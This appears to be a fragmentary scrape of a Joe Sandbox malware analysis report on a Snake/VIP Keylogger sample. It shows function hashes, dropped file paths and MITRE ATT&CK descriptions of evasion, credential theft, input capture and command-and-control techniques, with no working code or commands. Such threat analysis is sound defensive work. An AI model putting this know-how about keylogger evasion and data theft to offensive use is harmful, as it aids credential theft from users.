Instruction Fuzzy Hash: 2DC1AD74E10218CFDB54DFA9C994B9DBBB2FB89300F2481A9D409AB364DB349E85CF50

Function 06DFEB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323b7c45d0af24dabefda90a3f847314fba79f5b161b1313305fe885436c7bcd
Instruction ID: 1cbe263dca04af04bef868fbd47c29e6384d78ecc2befa415c4e8ba13b6e8c3d
Opcode Fuzzy Hash: 323b7c45d0af24dabefda90a3f847314fba79f5b161b1313305fe885436c7bcd
Instruction Fuzzy Hash: 47C1AE74E10218CFDB54DFA5D954B9DBBB2BB89300F1081A9D409AB364DB359E85CF50

Function 06DFD0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b4bfb8cf85cbaf00a109c245f8b88657ca6b426e096da4277cc4b770d7e8f7
Instruction ID: a73156eb9fcc1f83d412d2f387497a7fe4b4cfad8b7f305f2c21307cc47f8b84
Opcode Fuzzy Hash: 56b4bfb8cf85cbaf00a109c245f8b88657ca6b426e096da4277cc4b770d7e8f7
Instruction Fuzzy Hash: 39C19D74E10218CFDB64DFA9C994B9DBBB2BF89300F1081A9D409AB364DB359E85CF50

Function 06DFCCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94bf88b3034e96a01d7f6da81f80355285638af7527d8e971f31f6d0bfbf394e
Instruction ID: 66001ee75df615c2aac56041c5edd5c36980230ad433de1b2f48fcd01aad465e
Opcode Fuzzy Hash: 94bf88b3034e96a01d7f6da81f80355285638af7527d8e971f31f6d0bfbf394e
Instruction Fuzzy Hash: D1C19D74E10218CFDB54DFA9C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF50

Function 06DFF810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c9b9ba513598f7e3790654eec64b0cbeb0225cd6f100aed90db531de6716ff
Instruction ID: 59ec7544d9178fd89fe0d660d93fdbc6def6e129daa0f59727c67cae0ff47a67
Opcode Fuzzy Hash: 44c9b9ba513598f7e3790654eec64b0cbeb0225cd6f100aed90db531de6716ff
Instruction Fuzzy Hash: 4EC1AE74E10218CFDB54DFA9C994B9DBBB2FB89300F1481A9D809AB364DB359E85CF50

Function 06DFD9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9b35781a8d603dbd3f3641d39142dd30854661aafad08de775678146c369cd
Instruction ID: efbf021a8f72fd07f0f8c49cccaeb9ecc9bc79e4455edbc25b89605b0997350f
Opcode Fuzzy Hash: 2b9b35781a8d603dbd3f3641d39142dd30854661aafad08de775678146c369cd
Instruction Fuzzy Hash: D5C19E74E10218CFDB54DFA9C994B9DBBB2BF89300F1081A9D809AB365DB359E85CF50

Function 06DFD550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0721f3c4f9caa4265e3802a1ad1b9437dce0b2ed6e958cdbb0f164963edcc08
Instruction ID: 506366d14fe905c32f214e1ac47a47ce84f05deac2fb0f8e3824b29db8de41b7
Opcode Fuzzy Hash: e0721f3c4f9caa4265e3802a1ad1b9437dce0b2ed6e958cdbb0f164963edcc08
Instruction Fuzzy Hash: B8C1AD74E10218CFDB54DFA9C994B9DBBB2BF89300F2081A9D409AB365DB359E85CF50

Function 01686920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 01686952
\;q, xrefs: 01686936
\;q, xrefs: 0168692C
\;q, xrefs: 0168695E

Memory Dump Source

Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 05b23bd01a7bc684821df875a0d4ddf520fb29136eddcbfa6cbf83636f8620af
Instruction ID: e704c50726da50d4320128a55ccb2430128eb32dbc4b575ddcb2accc57cecbe1
Opcode Fuzzy Hash: 05b23bd01a7bc684821df875a0d4ddf520fb29136eddcbfa6cbf83636f8620af
Instruction Fuzzy Hash: 20018F317001168FDF25AA2DC944AA677E6AF886A4729436AE906CB3F1DB71DC428790

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VbcXXnmIwPPhh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gc3jpauf.ryz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lj0wzbyw.y3g.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mljpq4ed.5sw.ps1

C:\Users\user\Documents\VIPRecovery\Screenshot.png

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
VbcXXnmIwPPhh.exe

Function 0308B0A8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 0308590C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Function 030844B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0308D0B8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0308D581 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 0308B298 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 0AB11760 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Function 0AB11758 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre